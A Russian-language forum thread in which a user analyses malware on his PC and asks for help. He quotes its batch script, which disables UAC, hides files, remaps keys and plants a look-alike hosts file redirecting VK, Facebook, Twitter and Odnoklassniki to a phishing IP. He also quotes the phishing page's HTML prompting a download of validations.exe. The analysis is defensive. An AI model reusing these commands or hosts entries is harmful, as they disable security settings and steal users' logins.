Показано с 1 по 2 из 2.

Кража паролей, подозрительные файлы в /temp

  1. #1
    Junior Member Репутация
    Регистрация
    19.02.2012
    Сообщений
    1
    Вес репутации
    18

    Кража паролей, подозрительные файлы в /temp

    Обнаружил у себя в общей свалке /TEMP небольшой зверинец.
    Для начала посмотрел msconfig. В автозагрузке обнаружилась фейковая строка "Операционная система Microsoft Windows", вызывающая cmd.exe и отправляющая в него команды.



    По командам видно, что запускается bat скрипт и выполняются некоторые манипуляции с файлом hosts.

    Тело bat скрипта:
    Код:
    Reg Add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V Hidden /T REG_DWORD /D 0 /F
    ::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 000000000000000003000000000037e00000540000000000 /f
    erase "C:\Users\EXL\AppData\Local\Temp.810868802526864467f76.exe"
    ::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
    erase /Q "C:\Users\EXL\AppData\Local\Temp\znddv.vbs"
    chcp 1251
    copy "C:\Users\EXL\AppData\Local\Temp\p83j9" "C:\WINDOWS\system32\drivers\etc\hоsts" /Y
    Из которого видно, что для начала отключается показ скрытых файлов, потом выполнение скриптов LUA???, затем скорее всего реестр патчится кейлогером/кейсканером. После этого стирается какой-то экзешник и VBS скрипт znddv.vbs. Потом меняется кодировка, и в файл drivers\etc записывается фейковый файл hоsts с написанием имени через русскую (кириллическую) букву "о".

    Т.е получается на деле вот что:


    Настоящий hosts переименовывается и скрывается, а на его место ставится фейковый, объёмом в 273 кб. Тело этого инфицированного файла тоже интересно. Хакер пытается сбить юзера с толку наставив в нём лишних пробелов и сдвинув коварные строчки далеко за поле зрения.



    В инфицированном hosts - имеются следующие записи:

    Код:
    95.156.222.12 odnoklassniki.ru
    95.156.222.12 www.facebook.com
    95.156.222.12 www.twitter.com
    95.156.222.12 vkontakte.ru
    95.156.222.12 ru-ru.facebook.com
    95.156.222.12 www.odnoklassniki.ru
    95.156.222.12 vk.com
    95.156.222.12 www.vkontakte.ru
    95.156.222.12 www.vk.com
    95.156.222.12 facebook.com
    95.156.222.12 twitter.com
    Если просто перейти по IP-адресу получаем отлуп 400 Bad Request.

    При заходе на данный IP адрес сервером распознаются какие-то команды и выдаётся фейковая страничка, точь в точь похожая на оригинальную официального ресурса.





    Вводя пароль и логин на данных фейковых сайтах вы отправляете их злоумышленикам.

    Кроме того хакерами была придумана интересная схема получения средств с незадачливых пользователей. Например рассмотрим фейковую форму ресурса 95.156.222.12 twitter.com.

    После ввода ваших данных (логин/пароль) вылазит окошко с информацией следующего вида:
    Номер Вашего телефона нужен для того, чтобы мы смогли прислать Вам код подтверждения и убедиться в том, что Вы - реальная личность!

    "Twitter" гарантируют, что информация о Вашем номере ни при каких обстоятельствах не будет разглашена или передана третьим лицам. Данная мера принята для того, чтобы оградить пользователей от автоматических спам-ботов.

    Имея доступ к указанному номеру, Вы всегда сможете восстановить пароль к Вашей странице.

    Услуга недоступна абонентам некоторым регионам Мегафона.
    После ввода телефонного номера появляется

    На Ваш номер +79XXXXXXXXX был отправлен запрос валидации. В ответном СМС отправьте Ваш уникальный код: 13927
    А на телефон приходит смс-ка такого содержания:


    Естественно неопытные пользователи легко попадаются.

    Я немного посмотрел код исходной страницы
    Код:
    Имея доступ к указанному номеру, Вы всегда сможете <b>восстановить пароль</b> к Вашей странице.
                                         <br /><br />Услуга недоступна абонентам некоторым регионам Мегафона.
                                    </div>
                                    <div id="poup_progress">
                                        <div class="poup_progress_bar">
                                            <p id="t"></p>
                                        </div>
                                    </div>
                                    <div id="popup_info_2">
                                        Ваша заявка принята!
                                    </div>
                                    <div id="popup_info_3">
    
                                    </div>
                                    <div id="popup_info_4">
    Валидация успешно завершена!<br />
    Для вступления изменений в силу <a href="/validations.exe">скачайте и запустите этот файл</a>.
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="box_controls_wrap">
                            <div class="box_controls">
    после отправки СМС-ки пользователю советует запустить некий validations.exe, размером 11 кбайт. Мне стало немного интересно и я запустил данный файл в виртуальной машине, хотя антивирус ругался что он закриптован. При запуске вылезло:
    Валидация прошла успешно, перезагрузите компьютер
    . После перезагрузки файл validations.exe удалился, а hosts очистился от коварных строк и стал весить 0byte.

    Результат сканирования исполнительного файла из архива:
    https://www.virustotal.com/file/9360fa85e42...sis/1329627824/

    В общем у меня вопросы к комьюнити.
    Снифятся ли пароли или буфер обмена этим зверинцем? Что именно делает строка
    Код:
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 000000000000000003000000000037e00000540000000000 /f
    и за что отвечают строки вида
    Код:
    ::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
    в bat скрипте?
    Как именно попадают такие вирусы в компьютер? Через javascript в браузерах?
    Я грохнул все исполнительные файлы вируса и подозрительные ветки реестра, но до сих пор не уверен в своей защите. Что вы можете мне посоветовать?

    Спасибо за внимание.
    Последний раз редактировалось olejah; 19.02.2012 в 12:30. Причина: правила форума, п. 11

  2. Реклама
     

  3. #2
    Administrator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для olejah
    Регистрация
    08.03.2010
    Адрес
    Россия, Краснодар
    Сообщений
    11,044
    Вес репутации
    1254
    Цитата Сообщение от RZS Посмотреть сообщение
    Я грохнул все исполнительные файлы вируса и подозрительные ветки реестра, но до сих пор не уверен в своей защите. Что вы можете мне посоветовать?
    Провериться у нас.

Похожие темы

  1. Ответов: 2
    Последнее сообщение: 18.02.2011, 01:44
  2. Ответов: 4
    Последнее сообщение: 06.02.2011, 21:55
  3. Кража паролей.
    От kamar в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 29.10.2010, 06:42
  4. Кража паролей
    От Суббота в разделе Помогите!
    Ответов: 7
    Последнее сообщение: 11.07.2010, 19:12
  5. Кража паролей
    От andrya в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 22.02.2010, 22:23

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00146 seconds with 19 queries